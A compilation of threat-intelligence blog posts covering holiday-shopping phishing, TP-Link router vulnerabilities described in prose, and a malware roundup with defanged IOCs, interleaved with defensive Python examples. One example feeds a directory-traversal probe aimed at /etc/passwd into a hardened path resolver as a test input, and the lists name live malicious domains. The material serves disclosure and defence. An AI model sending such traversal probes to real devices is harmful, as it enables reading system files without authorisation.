Every year, more and more Americans are taking care of their holiday shopping on Cyber Monday.

Last year, consumers spent an all-time record $6.59 billion during the annual online shopping day, according to Adobe Insights. That doesn't mean no one is rushing out on Thanksgiving night to shop in person: shoppers still went out in droves on Black Friday last year, and Adobe estimated that Americans spent $2.43 billion on Nov. 25, 2017.

These two frenzied days open the door for bad actors to take advantage, hoping to trick uneducated consumers into clicking on malicious ads (a.k.a. malvertising) and emails disguised as shopping deals to phish credit card and personal information. Last year, 71 percent of emails that mentioned either “Black Friday” or “Cyber Monday” by name were classified as spam by Cisco Talos. Of that spam, 96 percent of the emails came from uncommon top-level domains (TLDs) such as .top, .stream, .trade and .bid.

One of the most prevalent domains associated with these emails is hxxp://bags-black-friday[.]top, which used the "hailstorm" technique: the attacker registers many domains, uses each of them to send hundreds of spam emails in a matter of minutes, and then never uses them again. Because those domains have no history in detection systems, the messages can slip past security controls and land in users' inboxes. The Cisco Umbrella data for bags-black-friday is below.
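The hailstorm behaviour described above has a recognisable shape in a mail gateway's own logs: a sender domain with no prior history, a burst of messages inside a few minutes, and (in this campaign) an uncommon TLD and a shopping lure in the subject. The following is an added example, not Talos code, that scores sender domains on those signals over a constructed mail log. The thresholds, the `mail.retailer.example` and `news.partner.example` domains and the log lines are assumptions for the example; the TLD list comes from the post's statistics and the `bags-black-friday.top` domain from the post.

```python
from datetime import datetime, timedelta

# TLD list from the post's statistics; everything else here is constructed
# for the example: (timestamp, sender domain, subject).
UNCOMMON_TLDS = {"top", "stream", "trade", "bid"}
SHOPPING_TERMS = ("black friday", "cyber monday")

MAIL_LOG = [
    ("2017-11-20T09:00:01Z", "bags-black-friday.top", "BLACK FRIDAY bags 90% off"),
    ("2017-11-20T09:00:04Z", "bags-black-friday.top", "Black Friday bags deal"),
    ("2017-11-20T09:00:09Z", "bags-black-friday.top", "black friday clearance"),
    ("2017-11-20T09:00:15Z", "bags-black-friday.top", "Black Friday: last chance"),
    ("2017-11-20T09:01:30Z", "bags-black-friday.top", "Cyber Monday preview"),
    ("2017-11-20T08:00:00Z", "mail.retailer.example", "Black Friday preview"),
    ("2017-11-21T08:00:00Z", "mail.retailer.example", "Black Friday preview"),
    ("2017-11-22T08:00:00Z", "mail.retailer.example", "Cyber Monday preview"),
    ("2017-11-20T09:00:05Z", "news.partner.example", "Weekly digest"),
]

# Sender domains the gateway has accepted mail from before (assumed history).
KNOWN_SENDERS = {"mail.retailer.example"}


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ")


def max_burst(timestamps, window):
    """Largest number of messages that fall inside any sliding `window`."""
    ts = sorted(timestamps)
    best, start = 0, 0
    for end in range(len(ts)):
        while ts[end] - ts[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def hailstorm_senders(mail_log, known_senders,
                      window=timedelta(minutes=5), threshold=5):
    """Return {domain: [reasons]} for senders that look like hailstorm spam.

    The deciding signal is a burst of at least `threshold` messages within
    `window` from a domain with no sending history; TLD and subject lure are
    recorded as supporting evidence. A real deployment would use a threshold
    in the hundreds, as in the campaign the post describes.
    """
    by_domain = {}
    for ts, domain, subject in mail_log:
        by_domain.setdefault(domain, []).append((parse_ts(ts), subject.lower()))

    flagged = {}
    for domain, msgs in by_domain.items():
        reasons = []
        burst = max_burst([t for t, _ in msgs], window)
        if burst >= threshold:
            reasons.append("burst:%din%ds" % (burst, int(window.total_seconds())))
        if domain.rsplit(".", 1)[-1] in UNCOMMON_TLDS:
            reasons.append("uncommon_tld")
        if domain not in known_senders:
            reasons.append("no_history")
        if any(term in subj for _, subj in msgs for term in SHOPPING_TERMS):
            reasons.append("shopping_lure")
        if burst >= threshold and "no_history" in reasons:
            flagged[domain] = reasons
    return flagged


if __name__ == "__main__":
    for domain, reasons in hailstorm_senders(MAIL_LOG, KNOWN_SENDERS).items():
        print(domain, reasons)
```

The retailer domain also uses the shopping terms and the partner domain also has no history, but neither bursts, so neither is flagged; the burst-plus-no-history pairing is what separates a hailstorm run from ordinary seasonal marketing.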

Based on last year’s metrics, Talos believes that there will be a similar spike in these kinds of emails after the holiday shopping season kicks off.

Talos has also seen several malicious sites hoping to capitalize on Black Friday and Cyber Monday. We have blacklisted several sites that contain either “Black Friday” or “Cyber Monday” directly in the URL name, indicating that attackers are hoping to draw customers in who are looking for deals specific to those shopping days. A complete list of these domains is in the “IOCs” section below.

Some of these URLs reference popular stores that often run sales, such as J.C. Penney and Pandora jewelry. There are several other malicious URLs that mention these holidays but have been inactive for an extended period of time as of Nov. 14. As we get closer to Thanksgiving, we anticipate that the number of URLs targeted at shoppers will rise, as well. It is typical of attackers to set up these malicious sites just as the shopping days are arriving, hoping to show up in internet searches and bypass the usual detection, as with the email campaigns mentioned above.

There are also specific malware attacks that have tried to capitalize on these "holidays." For example, Microsoft discovered a malware campaign in 2016 that disguised itself as a special deal from online retailer Amazon and downloaded the Locky ransomware onto victims' machines. Locky is a ransomware family that has been spread for years, mainly through email campaigns. Once launched, the malware encrypts users' files and demands a payment in order to return them. However, the threat of Locky has largely been wiped out by antivirus detection engines over the past year. (If you happen to be infected with Locky, we have an open-source decryptor here called "LockyDump" that can help you recover your files.)

With these numbers in mind, Talos recommends that shoppers take the following advice when planning to shop on Black Friday and Cyber Monday to protect themselves from common scams:

  • Ensure that you are only downloading apps from trusted and official app stores like the Google Play store and iOS App Store. 
  • Look out for apps that ask for suspicious permissions, such as access to your text messages, contacts, stored passwords and administrative features.
  • Some malicious apps will try to masquerade as a legitimate version of the one you could be searching for. Signs of these apps include poor spelling and grammar in app descriptions and interfaces, lack of high-quality performance and a developer contact that uses a free email service (such as
  • Avoid clicking on unsolicited emails. Make sure that you purposely subscribed to any marketing emails you are receiving from retailers.
  • Do not click on any files from untrusted sources. These often contain files that will execute unwanted programs on your machine.
  • Use an ad blocker locally on your browser. These will often block any malvertising campaigns that aim to capitalize on shoppers looking for deals.
  • Try to use payment services such as Google Pay, Samsung Pay and Apple Pay. These services use tokenization instead of the “Primary Account Number” (your credit card number), making your transaction more secure.
  • Use complex passwords that are unique, per site. Attackers commonly take passwords leaked from one site and try them against other sites where the same username is used, compromising multiple accounts at once.
  • If a deal sounds too good to be true, it probably is.

Our customers can detect and block these kinds of threats, as well, through a variety of our products.



Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN

Mon, 19/11/2018 - 12:30

Vulnerabilities discovered by Jared Rittle of Cisco Talos.

Cisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution.

There are two root causes for these vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads to TALOS-2018-0617 and TALOS-2018-0618, which can be exploited without authentication. Parsing errors are responsible for TALOS-2018-0619 and TALOS-2018-0620, which can only be exploited from an authenticated session. Code execution occurs in the context of the HTTPD process; since that process runs as root, an attacker can run code with elevated privileges.

All vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS 2018-0620, which was found only on HWv3 FRNv1.3.0.

TALOS-2018-0617 — TP-Link TL-R600VPN HTTP denial of service
An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated.

CVE: CVE-2018-3948

A full technical advisory is available here.

TALOS-2018-0618 — TP-Link TL-R600VPN HTTP server information disclosure
An exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system.

CVE: CVE-2018-3949

A full technical advisory is available here.
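Both TALOS-2018-0617 and TALOS-2018-0618 come from the same place: a URI handler that glues a decoded request path onto the document root, honours `..` segments, and never asks whether the result is a file. The following is an added example, not the router's firmware code, that shows the naive resolution next to a hardened one covering both bugs: traversal is refused before any filesystem access, and a path that resolves to a directory is rejected outright rather than handed to a loop that expects a file. The document root, the `is_dir` hook (injectable so the checks can be exercised without a filesystem) and the request paths are assumptions; the page-prefix list is the set of vulnerable pages named in the advisory.

```python
import posixpath
from os.path import isdir
from urllib.parse import unquote

# Assumptions for this example (not taken from the router firmware): the
# document root and the page prefixes the server is willing to serve.
WEB_ROOT = "/var/www/html"
ALLOWED_BASES = {"help", "images", "frames", "dynaform", "localization"}


def naive_resolve(raw_path, web_root=WEB_ROOT):
    """The pattern that yields a traversal: decode, join onto the root, then
    normalise. '..' segments are honoured, so the result can leave web_root."""
    return posixpath.normpath(posixpath.join(web_root, unquote(raw_path).lstrip("/")))


def safe_resolve(raw_path, web_root=WEB_ROOT, is_dir=isdir):
    """Map a request path to a file under web_root or raise ValueError.

    Checks, in order: one percent-decoding pass (anything still encoded is
    refused rather than decoded again), no NUL bytes, first segment in the
    served set, no '..' segments, resolved path still inside web_root, and
    not a directory (serving a directory as a file is what looped the router).
    """
    decoded = unquote(raw_path)
    if "%" in decoded:
        raise ValueError("double-encoded path")
    if "\x00" in decoded:
        raise ValueError("NUL byte in path")
    parts = [p for p in decoded.split("/") if p not in ("", ".")]
    if not parts or parts[0] not in ALLOWED_BASES:
        raise ValueError("path outside served prefixes")
    if ".." in parts:
        raise ValueError("directory traversal")
    root = web_root.rstrip("/")
    full = posixpath.normpath(posixpath.join(root, *parts))
    if not full.startswith(root + "/"):
        raise ValueError("resolved path escapes web root")
    if is_dir(full):
        raise ValueError("directory requested, not a file")
    return full


if __name__ == "__main__":
    probe = "/help/../../../../etc/passwd"
    print("naive :", naive_resolve(probe))
    for path in ["/help/index.htm", probe, "/help/%2e%2e/%2e%2e/etc/passwd", "/help/"]:
        try:
            print("safe  :", safe_resolve(path, is_dir=lambda p: p.endswith("/help")))
        except ValueError as err:
            print("safe  :", path, "->", err)
```

The final `startswith` check looks redundant after the `..` filter, and that is the point: it is the backstop that holds if a later change relaxes the segment filter, and it costs nothing.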

TALOS-2018-0619 — TP-Link TL-R600VPN HTTP server ping address remote code execution
An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.

CVE: CVE-2018-3950

A full technical advisory is available here.

TALOS-2018-0620 — TP-Link TL-R600VPN HTTP server fs directory remote code execution
An exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability.

CVE: CVE-2018-3951

A full technical advisory is available here.

Over the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest examples showing that such equipment is not only vulnerable, but also lacks the generic operating system protections (stack protection, ASLR and the like) that mitigate bugs such as buffer overflows. Fortunately, in the case of TL-R600VPN routers, the critical vulnerabilities that lead to remote code execution require authentication. However, the code would execute with root privileges.

The following Snort IDs have been released to detect these vulnerabilities:

Threat Roundup for Nov. 9 to Nov. 16

Fri, 16/11/2018 - 17:20

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 9 and Nov. 16. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, or

You can find an additional JSON file here that includes the IOCs in this post, as well as all hashes associated with the cluster. That list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.
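The IOC lists below are published defanged (`[.]` for `.`, `hxxp` for `http`), and, as the paragraph above warns, several entries are plumbing that benign software also touches (an external-IP lookup service, an open resolver). The following is an added example, not Talos tooling, that parses lists in this format, refangs the values, classifies them by type, and matches them against log lines while reporting hits on known-benign infrastructure as informational rather than as a verdict. The IOC values are taken from the lists in this roundup; the log lines, the `INFORMATIONAL` set and the hostnames in them are constructed for the example.

```python
import re

# Excerpt in the same defanged style as the lists in this roundup; the values
# are from those lists. The log lines further down are constructed.
IOC_TEXT = """
IP Addresses contacted by malware. Does not indicate maliciousness
  • 66[.]171[.]248[.]178
Domain Names contacted by malware. Does not indicate maliciousness
  • ipv4bot[.]whatismyipaddress[.]com
  • ns1[.]chopsuwey[.]org
Registry Keys
  • N/A
File Hashes
  • 008e2453c3bba10629ae8f7f32c6377d91bd17326da52295f038d7badd53cf4f
"""

# Public services that malware uses for plumbing (external-IP lookup, open
# resolvers); a hit on these is context, not a verdict. Assumed list.
INFORMATIONAL = {"ipv4bot.whatismyipaddress.com", "resolver1.opendns.com", "myip.opendns.com"}

LOG_LINES = [
    "2018-11-15T10:01:02Z dns client=10.0.0.5 query=ns1.chopsuwey.org type=A",
    "2018-11-15T10:01:03Z dns client=10.0.0.5 query=ipv4bot.whatismyipaddress.com type=A",
    "2018-11-15T10:01:04Z proxy client=10.0.0.5 dst=66.171.248.178:80 GET /gate.php",
    "2018-11-15T10:02:00Z edr host=WS05 sha256=008e2453c3bba10629ae8f7f32c6377d91bd17326da52295f038d7badd53cf4f path=C:\\Users\\a\\AppData\\Roaming\\Microsoft\\umitoa.exe",
    "2018-11-15T10:03:00Z dns client=10.0.0.9 query=www.example.com type=A",
]

SHA256_RE = re.compile(r"^[0-9a-f]{64}$")
IPV4_RE = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def refang(value):
    """Undo the defanging used in the lists so values can be matched."""
    return value.replace("[.]", ".").replace("hxxp", "http").strip()


def parse_iocs(text):
    """Collect bulleted values and classify each as ip, domain or sha256."""
    iocs = {"ip": set(), "domain": set(), "sha256": set()}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("•"):
            continue
        value = refang(line.lstrip("•").strip()).lower()
        if SHA256_RE.match(value):
            iocs["sha256"].add(value)
        elif IPV4_RE.match(value):
            iocs["ip"].add(value)
        elif "." in value and " " not in value:
            iocs["domain"].add(value)
    return iocs


def match_logs(lines, iocs):
    """Return (line_no, kind, value, verdict) for every IOC seen in a line.

    Values are matched as whole tokens (not inside a longer hostname or hash)
    and known-benign infrastructure is labelled informational.
    """
    patterns = [
        (kind, value, re.compile(r"(?<![\w.-])" + re.escape(value) + r"(?![\w.-])"))
        for kind, values in iocs.items() for value in values
    ]
    hits = []
    for number, line in enumerate(lines, 1):
        low = line.lower()
        for kind, value, pattern in patterns:
            if pattern.search(low):
                verdict = "informational" if value in INFORMATIONAL else "hit"
                hits.append((number, kind, value, verdict))
    return hits


if __name__ == "__main__":
    for hit in match_logs(LOG_LINES, parse_iocs(IOC_TEXT)):
        print(hit)
```

Grouping the hits by client address (10.0.0.5 touches a suspicious name server, an external-IP service and a C2-style URL within seconds) is where the single-IOC caveat turns into a real finding.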

The most prevalent threats highlighted in this roundup are:

  • Win.Ransomware.Gandcrab-6748603-0
    Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB", ".CRAB" or ".KRAB." It's spread through traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.
  • Win.Virus.Parite-6748128-0
    Parite is a polymorphic file infector. It infects executable files on the local machine and on network drives.
  • Win.Malware.Dijo-6748031-0
    Win.Malware.DIJO, also known as Ursnif, is used to steal sensitive information from an infected host and can also act as a malware downloader. It is commonly spread through malicious emails or exploit kits.
  • Win.Malware.Vobfus-6747720-0
    Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will run when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.
  • Win.Downloader.Upatre-6746951-0
    Upatre is a malicious downloader often used by exploit kits and phishing campaigns. Upatre downloads and executes malicious executables, such as banking malware.
  • Win.Malware.Emotet-6745295-0
    Emotet is a banking trojan that has remained relevant due to its continual evolution to bypass antivirus products. It is commonly spread via malicious emails.
Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c
  • \BaseNamedObjects\Global\pc_group=WORKGROUP&ransom_id=ab8e4b3e3c28b0e4
  • Global\7bf1bf81-e78a-11e8-a007-00501e3ae7b5
IP Addresses contacted by malware. Does not indicate maliciousness
  • 66[.]171[.]248[.]178
Domain Names contacted by malware. Does not indicate maliciousness
  • ipv4bot[.]whatismyipaddress[.]com
Files and or directories created
  • %AllUsersProfile%\Microsoft\Crypto\RSA\S-1-5-18\6d14e4b1d8ca773bab785d1be032546e_d19ab989-a35f-4710-83df-7b2db7efe7c5
  • %AppData%\Microsoft\umitoa.exe
  • %AppData%\Microsoft\hhbbvc.exe
  • \Win32Pipes.000006c8.00000045
  • \Win32Pipes.000006c8.00000047
  • \Win32Pipes.000006c8.00000049
File Hashes
  • 008e2453c3bba10629ae8f7f32c6377d91bd17326da52295f038d7badd53cf4f
  • 00f07cc799aabac7449a324ff47161a6a34ad02ba4b2074ddb382152d383ed14
  • 02edf037074ebd2445625737108f7337715a6af17ec161429fa0392894e479bd
  • 04196939eee8a21a4480a5e5bcf34f70b20f1dad9c3038bc632a415130ac47e8
  • 043f30bd958e54d6947631c10d70ddec772ababd8a3852ceb0e646e87d670a92
  • 051f4d57fc51e1491eb9121cb6ecdd036e140103f1afbc73fe9cef9a4fd67a84
  • 06cafb061ce341647e48d4113eb71bed76290d30d54ce6d98169fcfe8bbe83c5
  • 0799d33c49bceeeeb9c92077d448d5823ab8e71a04b71c6b8afa7f386fb5aa92
  • 08d56fc6c0622c2e931f04eb8c68a25fa431ac4833b1cbd7e44847d55f7f26e1
  • 09abf839c42200b000d3065d2cda41d858be415a521a5cb2b77b6e62503ae460
  • 0a48f61677791bca8d2553662ec6bce8acfdb3249cfcabac2802ba216ac54262
  • 0acc350e791e4201a7dd17e389ba8e03264343020432389d3e1b9d08874005af
  • 0b3e086550e4baaa05c69777d484b9b20773b01d5c6da124197eff423b798b04
  • 0dd771fecae00517f9297e21a42956d2ee113f6f0bc4d3ee277f887721efc19a
  • 0f2784bc6fb959eace7e44fd19fd08fbfa39af04b4f793241c3eddd4183dbe71
  • 0f50d6433d2a79f30c2417fc434098d029eceedf3acd405901d3951208be2ae7
  • 10b5897f820d7ae3fe0194b8969c42c5c5de6cc658baf95699f8a781e18237ff
  • 130f32c65f3f2e67bdc228f125bc07c049f40fae04114b0de920e9fd0b00bccf
  • 13ab0a6dcd3cfd5136b54d11739169917df37a5681189baf92c4c6b0a2df0bc9
  • 13ccda5af78a1dea028d076418db880ab3734c745f068d2c4df5de4d4968b478
  • 14094b6a6ba1af401829963ce991e02c0eb9da885eb3837cec88f1559e2007c6
  • 166627c9ad4fb0acb0bec8e09e1d4ceedc3110e7cdbaa709322d0dbe41a2f70f
  • 17b78d2828794c9612cc87b09b7254c32c810134e5d06742058c55ec55ddb746
  • 19b4d752b0be5e81c835bd3b87f3c1124c208ba6adb2150f7b85a1b76222350f
  • 1ac89466a2668afd8d06d0f9345d48151dc2978b81985070bb23e30a767bd71c

Screenshots of Detection
AMP


Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • Residented
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • N/A
Files and or directories created
  • %AppData%\Wplugin.dll
  • %WinDir%\Wplugin.dll
  • %SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\yma1.tmp
  • %LocalAppData%\Temp\neb2886.tmp
File Hashes
  • 00ad96301d29476dba58c071ef5bc4cf5eb265e9181a1d866bcacfe847199f64
  • 01edcc04020177e2f31b13d9f6a46db2e058028011151850b0802394ccda8d77
  • 05f816442e9d1d18a80233674af70d0ce6e17d10768d8f0e77973566b07aba8e
  • 0e70c57c577078b1c9cab7d6bd1215372330548ae0c20ff2b80f0cb86cde2074
  • 115995a5dc32df9da2f214cf9f4f81341daf7bc101c1b9346bead99428acb15e
  • 145c7866de76f33e571f19a1a40c2e12c900a6a1ad9bac30b46dcdc28be6feec
  • 14ac990a0affb831e4dccee45cff19e8a7c28dc5b93f731131ffa1c319e43823
  • 15c7b9a2c4688af296b57ac418f01347c8fbbd74ac5fbcae17c90f9bcdfb8e26
  • 16ee4360c7d1b78da48d06889177668120dfcaf62745bbc8c88d7864d28ba43d
  • 1817a467dba009e325a1c8bbaa5c274ec80856f8936321980fee86a0e33a34cd
  • 181dd25663e2628e56410e65b57677f5f3346866ccb737aa2eab8dd7376a11af
  • 1c8698e1bd9fa33f8f664a0a12e90db53e91e31414cd307c21575a5d039b0d32
  • 1eece81891ab4f4836931f8b1bc630e044d08ed659797dc19afc3bebd3b2b259
  • 1fa3b372ec521a5b57a52d8b6a5ec8de67f5d8f80e87835b67b4916d4e5dd415
  • 29f37223352f9584de101958ce00b41c3c66d9cfb15cc27d22a67df2c9dcd53e
  • 2aea31075160d93b13bb726dc95b2a46505deefa529f8c9edfd9f6ecd8d80a37
  • 300655178fabae5c65e48307fef7de67100b7d866b118f1ca0f0919de7e3a490
  • 35270fa68190eba46f59bba10c8dce3a03e55d8af7e8a33f9a330e077f63aeff
  • 39cb46a92889429d3dfc422381b46d04f9e69af0a088eec656845f184ed0b8f2
  • 3b6a4dbf9a923ac935f6f671b38de0ed83da428b74dea48efa180365a507e13f
  • 452ce18b59c1ab0cb4925435edf60edcfc5114cdea15056702e69c45af5763a2
  • 4e38b473973bce00cf5f60b545327db9c9e8b17225262e88d13299f6abf579f2
  • 51a323f3b47edc969017af5b31d364d4f23574471a52511970aaf54a8c34c382
  • 51bbe9d3ae4bd23f31fd90ddf0d8af295ca98773653a16c2bb5a950670352888
  • 525bc89d56339ce9423aae276228a8b879d7156ecadff7054a397a8d5178f5f0

Screenshots of Detection
AMP


Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 95[.]181[.]198[.]115
  • 192[.]162[.]244[.]171
Domain Names contacted by malware. Does not indicate maliciousness
  • resolver1[.]opendns[.]com
  • 222[.]222[.]67[.]208[.]in-addr[.]arpa
  • myip[.]opendns[.]com
  • www[.]bing[.]com
  • hq92lmdlcdnandwuq[.]com
  • cyanteread[.]com
  • tmencedfur[.]com
Files and or directories created
  • %LocalAppData%\Temp\RESB9BE.tmp
  • %LocalAppData%\Temp\CSCE580781F303F45AE9F8858B262C2D7E7.TMP
  • %LocalAppData%\Temp\9DF6.bin
  • %LocalAppData%\Temp\CB8E.bin
  • %LocalAppData%\Temp\3F14.bi1
  • %LocalAppData%\Temp\RESBCAB.tmp
  • %LocalAppData%\Temp\CSC8B3FB8E53BAD4C5CA67A2B1CAEA0ABB3.TMP
  • %LocalAppData%\Temp\5mq30dkw.2sp.psm1
  • %LocalAppData%\Temp\jrz15mzo.uwv.ps1
  • %LocalAppData%\Temp\lajoenvy.0.cs
  • %LocalAppData%\Temp\lajoenvy.cmdline
  • %LocalAppData%\Temp\lajoenvy.dll
  • %LocalAppData%\Temp\lajoenvy.err
  • %LocalAppData%\Temp\lajoenvy.out
  • %LocalAppData%\Temp\lajoenvy.tmp
File Hashes
  • 0024d14e96fc79b1f7fd052945424e685843a48b1124f2b19b3a0b00570fb716
  • 004a4d3772f1253ed309ce48cdefb8358c7500b91b7fc1a548dd32af03f8178d
  • 00f9d43bdeb5c30acc9e5594c0ff1bd29b52efdcaa63bb8eba745342c165f856
  • 0169eb0d2386671d1929cf74456a32da1758d8c177b4dadbb5c1998768eee892
  • 016ef438660d7acbe94a229f0680b154bb963bc9dbc56eed7450dab36d486c01
  • 01aa3a5ab9590ff079a13d66f67d40b441ab171d2a6ead0df5453b2d3b55888d
  • 01e4c31f4836784dc4d297c4ba6e8f680216693735339022e11669960b929dcc
  • 020c8eff9905e60c6bba7ff500dd0097b0b3017cfa33712a74ff23062c539520
  • 0326d68f08fc899cd8bb7f1a9c1d7df50bc5b979e0f7d2532904a419ab1b7160
  • 033370dfd1d35bc66ed5abf0e6f6ff214c9e1e25196fef04679f18875b0b683c
  • 0383644a89640bbccf401520a918b54920f038e04ec0b0ae0d5aa53c45c08705
  • 03d315458bfc34d01d2e058b6aa772c7fcd294f3dbcd821f71249675da00d94e
  • 03df086184a6b1b146858ea3cef951dc9c3bf6148a26740a74e2384f5cc4a256
  • 03e17ccdc6dfa104759f6d08c38a1ee96fd9cb161600fb5446b61132e4d9bd3d
  • 04abd09ae808338d64a59fedb49dd5af79599cb9e990c2eab869d1afb25285a1
  • 04ef397e7e52f4c71553f5eb2d4bc1971d2eda8a54eafa5a23aae4700264688d
  • 05a5bbabbab5444214ce70c1190f41ccef8ef3dee786d1821d26a396d8a49eb5
  • 07b911ca945371e153a661cc0d3dc04a41e75075b184eeba26a82c6a945a82e2
  • 0879b668fbfac129d1c21076fc5826d46323398a3bcd327e4012be584778a446
  • 095114cf4e2a81c44821a1ad9d4ea632e8cf17cf35a5cabc65813a29bcc41157
  • 0a088fe8df26a9a2cd4330224134e1ea0d249300cbce0eaf11fc6f70b75f21f1
  • 0ad6e9f9cd8e64c8ec265d258407f627fb1a872d13bd9cb577ad5e100633f492
  • 0b438e78bb3fe8bffc8f5f1453f318efe177c97d9e4f0ba7e26969a60671a67e
  • 0b4d5c0751ead190373484f7b4d8f0d7e5de5ade613b888712b92947fc173a6a
  • 0d1b953aa006b38c0140f3a2bacda47a28262d54d5676aeeaf432235e356a5bd

Screenshots of Detection
AMP



Indicators of Compromise
Registry Keys
    • Value Name: muehe
Mutexes
  • \BaseNamedObjects\A
  • A
IP Addresses contacted by malware. Does not indicate maliciousness
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness
  • ns1[.]chopsuwey[.]org
  • ns1[.]chopsuwey[.]biz
  • ns1[.]chopsuwey[.]info
  • ns1[.]chopsuwey[.]com
  • ns1[.]chopsuwey[.]net
Files and or directories created
  • \??\E:\autorun.inf
  • \autorun.inf
  • \??\E:\System Volume Information.exe
  • \System Volume Information.exe
  • \$RECYCLE.BIN.exe
  • \??\E:\$RECYCLE.BIN.exe
  • \Secret.exe
  • \??\E:\Passwords.exe
  • \??\E:\Porn.exe
  • \??\E:\Secret.exe
  • \??\E:\Sexy.exe
  • \??\E:\x.mpeg
  • \Passwords.exe
  • \Porn.exe
  • \Sexy.exe
  • %SystemDrive%\Documents and Settings\Administrator\sauuyi.exe
  • %UserProfile%\muehe.exe
  • \??\E:\RCXFF.tmp
  • \??\E:\muehe.exe
  • \RCXFBD0.tmp
  • \RCXFF.tmp
  • \muehe.exe
File Hashes
  • 010054eb95e98fdfea1f1164b12a5dcf475f0ffcc16dc18c276553d4bce3e39c
  • 01cdf16c052bd4d6e8f50d0447f0570b6e42727cbb3dcebed6e20766a0599854
  • 02785ab8fe2473f20ea32dad5908f6b8831d603c26db26e67e8b3d1daefd4544
  • 0293926921291e6700eddb633fe22ac136735ace9170e6c502be52039d3e7488
  • 02f72dfcc27501cd1a44b3a0eed9e41831f745fc26d6b7d1526c151c94d58333
  • 0572a5a7f2888736e647fccbd2d4ed051bb038b82d3d53fb899dcde836922fc2
  • 0581546a844cf13d0f0c494c9cda7eb7a71a5dbea4abbd8ddb917fe00665965b
  • 06383e4b2c2a596732f85ce8028c5b1c0a60c82e75bbb75358bcd8498b6b4b03
  • 080d08b5202a6da7052a3256c1863db41121881d75188ad96b9af9ab5932a97e
  • 08293e6522e8888ce18400e0c3d6e6ac1319e80bd99ffd24b8e7845fca091cf5
  • 08c0cc2e37a1fbc8f84c932a7cb2bc9a3d3f78a4ce086c1286cb3d335619f9ff
  • 0b2752012a9e104641af14d60987db12a41d39401ac46584b6e9125ed5d0c198
  • 0bcd28d3d84c7518df94abbb5a8153a345121d1d126fc9dc4624259de02a41ab
  • 0c45087137456380ec673b12d06310d8d753be92a3009bcec94ec4ebc2140bb7
  • 0ceecae1d802f19881b04e6f97af98b5039f2b8ccd538c293d66de93d8d77964
  • 0d9a84172a0f96b340eb3f6bd45ca30dbe6c20180f9dae75cb135d0d8b6ffa38
  • 0db0feea81c1b211fbae852151734fca8fb423102cb953dafb3c188f40491482
  • 0ea8e078ab8b42d97148b488fb1ad7d21972c37fdac7befc7d462ee7be3acb84
  • 0feb943bda713bb872c82a94bceb10acd11a1ec0cd2997236dc17da24b646288
  • 121a6b3a8000948f073e3660ecafb19bf5d204a9d468112575afd15c39222eb1
  • 12fc93e4e1c01ce7e3670138d50aa26e5c3d77f3c42da0dc3bd7bbae57359dc4
  • 133fea888e19e34c7703b38194ec08360ce8d697d7aec79da979a35072adce02
  • 145fe07226fb8eb92f609f16f7044ae5a529433730d285ca7c33b9cff6b86b71
  • 1551de875bb37b13c332d5b67ed64026c477f21bbcc6ad3d50ba8b3b8702ee5f
  • 18ee7ed2c61ee532f9a42d02c3c53b017496071608324361117514bdd3fdcade

Screenshots of Detection
AMP



Indicators of Compromise
Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses contacted by malware. Does not indicate maliciousness
  • 195[.]38[.]137[.]100
Domain Names contacted by malware. Does not indicate maliciousness
  • drippingstrawberry[.]com
Files and or directories created
